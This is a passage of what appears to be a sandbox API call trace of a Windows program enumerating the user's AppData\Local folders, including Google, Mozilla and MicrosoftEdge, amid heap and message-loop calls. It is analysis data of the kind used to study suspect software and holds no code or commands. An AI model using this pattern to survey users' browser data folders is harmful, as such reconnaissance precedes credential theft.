(HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e56568 [0242.549] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x42, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0xa87690 [0242.550] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x42, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0242.550] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x42, dwReserved1=0x8cf2d0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0242.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0242.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b88 [0242.550] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.550] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.550] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.551] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.551] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0242.551] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.551] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.552] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0242.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0242.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.552] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0242.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.552] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.553] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.553] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0242.553] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.553] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.553] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 1 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0242.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0242.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0242.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.554] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0242.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.554] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0242.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0242.555] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 1 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0242.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0242.555] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.633] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 1 [0242.633] TranslateMessage (lpMsg=0x8cf618) returned 0 [0242.633] DispatchMessageW (lpMsg=0x8cf618) returned 0x0 [0242.633] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0242.634] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0242.634] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0242.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0242.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0242.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0242.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0242.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0242.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.634] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.634] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.634] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0242.634] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0x0, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.635] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.636] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] FindNextFileW (in: hFindFile=0xa87690, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0242.637] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 